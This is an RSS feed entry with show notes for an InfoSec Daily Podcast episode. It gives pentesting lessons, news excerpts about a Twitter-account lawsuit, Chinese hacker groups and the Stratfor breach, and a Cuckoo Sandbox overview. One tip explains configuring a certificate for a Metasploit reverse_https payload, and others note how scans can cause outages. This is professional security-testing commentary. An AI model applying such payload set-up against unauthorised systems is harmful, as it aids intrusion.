<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pentest Lessons</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. &nbsp;Sending a web server check (GET / HTTP/1.0) can crash the Oracle cluster service (or at least it used to)</span><a href="https://twitter.com/#%21/sawaba"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@sawaba</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. &nbsp;You can specify a valid cert to be used with a reverse_https payload (requires cert+key in the same file): set SSLCert /path/to/cert.pem. &nbsp;</span><a href="https://twitter.com/#%21/hdmoore"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@hdmoore</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. &nbsp;Do not use a new tool or exploit on a customer&#39;s network without testing it in a controlled environment first.</span><a href="https://twitter.com/#%21/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@pentestlessons</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. &nbsp;Patch and/or update your software (sploits, metasploit, nessus, etc.) before you go on-site. &nbsp;There is nothing worse that being on-site and not being able to update anything.</span><a href="https://twitter.com/#%21/b105h4ck3r"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">&nbsp;@b105h4ck3r</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. Ensure you ask the customer whether they use sa accounts for their MSSQL servers, or if they have low threshold for lockouts before you even start scanning their networks. nmap -A and nessus default scans test the top 6 passwords, and if they have a lockout of 4, you probably just shut down all their database applications.</span><a href="http://www.twitter.com/krangarajan"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@krangarajan</span></a><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6. &nbsp;If possible, get familiar with the networking equipment in use before running scans, as some may not be able to handle the most mundane, typical port scans! </span><a href="https://twitter.com/#%21/sawaba"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@sawaba</span></a></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In one case, I was scanning systems attached to an ancient HP switch, and overflowed the buffers. As a result, no one connected to the switch could access the Internet. All 6 feet, 7 inches of the CEO burst into the conference room and boomed, &quot;Who the fuck BROKE my INTERNET?&quot;.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&#39;m not sure if Checkpoint firewalls are still set up this way, but even a few years ago, they used to have a persistent &quot;Connection Table&quot; the firewalls I encountered had this table set to 40,000 connections. It would statefully track all these connections until they closed or timed out. The timeout value, if the connection was not cleanly closed was set to 2 hours. The problem was that, once the connection table was filled, it wouldn&#39;t allow any new connections, and would drop any new TCP connections. A typical NMap scan, scanning all 65535 ports on a single host located on the other side of this firewall, would fill up the table, and cause an outage for this company.</span></li>
</ul>
<p>
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theaustralian.com.au/media/writer-sued-over-twitter-account/story-e6frg996-1226231108293"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theaustralian.com.au/media/writer-sued-over-twitter-account/story-e6frg996-1226231108293</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A US website is trying to recoup US $340,000 from a former employee who made the company&#39;s Twitter presence a favoured haunt.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For the past four years technology writer Noah Kravitz worked for popular mobile phone site Phonedog.com. He maintained the Twitter account @Phonedog_Noah which over the period amassed 17,000 followers.</span></p>
<p>	<a href="http://www.nytimes.com/2011/12/26/technology/lawsuit-may-determine-who-owns-a-twitter-account.html?_r=1"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">The New York Times reports</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Phonedog.com is now suing Mr Kravitz for compensation, arguing the Twitter following is a customer list and that it is entitled to US$2.50 for each follower.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the newspaper, when the writer left the company in October 2010 it was agreed he could keep the Twitter account in return for occasionally tweeting links about the website.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, eight months later the company sued their former employee claiming that despite Mr Kravitz having changed his Twitter handle to @NoahKravitz it still retained ownership of the original 17,000 followers and deserved to be compensated.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In statement issued to NYT, Phonedog.com said: &ldquo;The costs and resources invested by PhoneDog Media into growing its followers, fans and general brand awareness through social media are substantial and are considered property of PhoneDog Media. We intend to aggressively protect our customer lists and confidential information, intellectual property, trademark and brands.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<a href="http://twitter.com/#%21/noahkravitz"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">noahkravitz</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Noah Kravitz</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you&#39;re going to unfollow me, don&#39;t do it to save me legal fees. Do it b/c you hate my 11 Most Important Gadgets of 2011 bit.ly/vTbXQt</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.theregister.co.uk/2011/12/24/china_cybercrime_underground_analysis/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/24/china_cybercrime_underground_analysis/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cybercrooks and patriotic state-backed hackers in China are collaborating to create an even more potent security threat, according to researchers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Profit-motivated crooks are trading compromised access to foreign governments&#39; computers, which they are unable to monitise, for exploits with state-sponsored hackers. This trade is facilitated by information broker middlemen, according to Moustafa Mahmoud, president of The Middle East Tiger Team.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mahmoud has made an extensive study of the Chinese digital underground that partially draws on material not available to the general public, such as books published by the US Army&#39;s Foreign Military Studies Office, to compile a history of hacking in China. His work goes a long way to explain the threat of cyber-espionage from China that has bubbled up towards the top of the political agenda over recent months.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first Chinese hacking group was founded in 1997 but disbanded in 2000 after a financial row between some of its principal players led to a lawsuit. At its peak the organisation had about 3,000 members, according to Mahmoud. The motives of this so-called Red Hacker group were patriotic, defending motherland China against its enemies.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacking the US Embassy and the White House over the accidental bombing of the Chinese Embassy in Belgrade back in 1999 brought many flag-waving Chinese hackers together to, as they saw it, defend the honour of the motherland and fight imperialism in cyberspace.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This role was taken over by the Honker Union of China (HUC) after 2000, and the HUC later became the mainstay of the Red Hacker Alliance. China&rsquo;s so-called &ldquo;red hackers&rdquo; attack critics of the state and infiltrate foreign government and corporate sites &ndash; among other activities. The phenomenon of patriotic hackers is far from restricted to China and also exists in Russia, for example. Russian hackers tend to make greater use of defacement and botnets to silence critics rather than spying.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://news.xinhuanet.com/english/sci/2011-12/27/c_131329655.htm"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.xinhuanet.com/english/sci/2011-12/27/c_131329655.htm</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stratfor, a global intelligence company, said some victims of a data breach may be targeted again for offering public support for the company after they speak out about the hacking, according to media reports on Tuesday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">U.S.-based Stratfor, provides independent analysis of international affairs and security threats and describes itself as a publisher of geopolitical analysis.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It charges subscribers for its reports and analysis, delivered through the web, emails and videos.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stratfor said on its Facebook page that its affected clients and its supporters &quot;are at risk of having sensitive information repeatedly published on other websites.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the Associated Press, the hacking movement &quot;Anonymous&quot; claimed Sunday through Twitter that it had stolen thousands of credit card numbers and other personal information belonging to the company&#39;s clients.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Stratfor spokesman said several law enforcement agencies are investigating the incident but would not say whether the information was encrypted in its database.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The data was posted in a series of releases in links embedded in online messages that, in turn, were linked to Twitter.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some of the files appeared to be alphabetical listings of Stratfor clients with related credit card information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The amount posted suggests that information about more than 100,000 individuals and thousands of companies was exposed, according to the AP report.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcworld.com/article/247044/facebook_post_saves_woman_from_hostage_situation.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcworld.com/article/247044/facebook_post_saves_woman_from_hostage_situation.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Utah woman and her 17-month-old son were rescued from a residence after she posted a desperate status update on Facebook.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the </span><a href="http://www.google.com/hostednews/ap/article/ALeqM5h2c0EBQh7ry6lvOQe4V26jZtYLaA?docId=a60a26340e6140e3b1ef499c8f449b64"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Associated Press</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the woman and her disabled son were held captive for about four or five days, during which they were abused both physically and sexually. Sergeant Jon Arnold of the Salt Lake City Police Department told the Associated Press that the woman hid in a closet with her laptop and posted a status update on Facebook saying she would be &quot;dead by morning&quot; if they were not rescued.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of her Facebook friends called the police after seeing her post, and the police went to the residence to investigate. When they arrived at the residence, they were met by 33-year-old Troy Reed Critchfield. Critchfield initially wouldn&#39;t let the police in, but they were finally allowed in and allowed to talk to the woman.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">She told them she and her son had been held hostage in the house for about five days, during which they had been hit, choked, and sexually abused.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Arnold said that while the woman had &quot;injuries consistent with the allegations,&quot; she refused to go to a hospital for treatment.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The police eventually arrested Critchfield on suspicion of aggravated kidnapping, forcible sodomy, aggravated assault, domestic violence, child abuse, animal cruelty, and other charges. Critchfield has a record &#8212; in 2010, he pleaded guilty to charges of felony aggravated assault and obstruction of justice.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.cuckoobox.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cuckoobox.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In three words, Cuckoo Sandbox is a malware analysis system. &nbsp;Its goal is to provide you a way to automatically analyze files and collect comprehensive results describing and outlining what such files do while executed inside an isolated environment.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s mostly used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But it can do much more&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s up to you to discover what and how.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some of the results that Cuckoo generates are:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trace of performed relevant win32 API calls</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dump of network traffic generated during analysis</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Creation of screenshots taken during analysis</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dump of files created, deleted and downloaded by the malware during analysis</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trace of assembly instructions executed by malware process</span></li>
</ul>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition, Cuckoo allows you to:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Automate submission of analysis tasks</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Create analysis packages to define custom operations and procedures for performing an analysis</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Run multiple virtual machines concurrently</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Script the process and correlation of analysis results data</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Script and automate the generation of reports in the format you prefer</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-554-pentesting-lessons-twitter-suite-hidden-dragon-stratfor-again-facebook-911-cuckoo-boris-top-5/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3309/0/infosec-daily-podcast-episode-554.mp3" length="26833124" type="audio/mpeg" />
		<itunes:duration>0:55:51</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 554 for December 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka t[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 554 for December 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons
	1. &#160;Sending a web server check (GET / HTTP/1.0) can crash the Oracle cluster service (or at least it used to) @sawaba
	2. &#160;You can specify a valid cert to be used with a reverse_https payload (requires cert+key in the same file): set SSLCert /path/to/cert.pem. &#160;@hdmoore
	3. &#160;Do not use a new tool or exploit on a customer&#39;s network without testing it in a controlled environment first. @pentestlessons
	4. &#160;Patch and/or update your software (sploits, metasploit, nessus, etc.) before you go on-site. &#160;There is nothing worse that being on-site and not being able to update anything. &#160;@b105h4ck3r
	5. Ensure you ask the customer whether they use sa accounts for their MSSQL servers, or if they have low threshold for lockouts before you even start scanning their networks. nmap -A and nessus default scans test the top 6 passwords, and if they have a lockout of 4, you probably just shut down all their database applications. @krangarajan 
	6. &#160;If possible, get familiar with the networking equipment in use before running scans, as some may not be able to handle the most mundane, typical port scans! @sawaba

In one case, I was scanning systems attached to an ancient HP switch, and overflowed the buffers. As a result, no one connected to the switch could access the Internet. All 6 feet, 7 inches of the CEO burst into the conference room and boomed, &#34;Who the fuck BROKE my INTERNET?&#34;.
I&#39;m not sure if Checkpoint firewalls are still set up this way, but even a few years ago, they used to have a persistent &#34;Connection Table&#34; the firewalls I encountered had this table set to 40,000 connections. It would statefully track all these connections until they closed or timed out. The timeout value, if the connection was not cleanly closed was set to 2 hours. The problem was that, once the connection table was filled, it wouldn&#39;t all[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
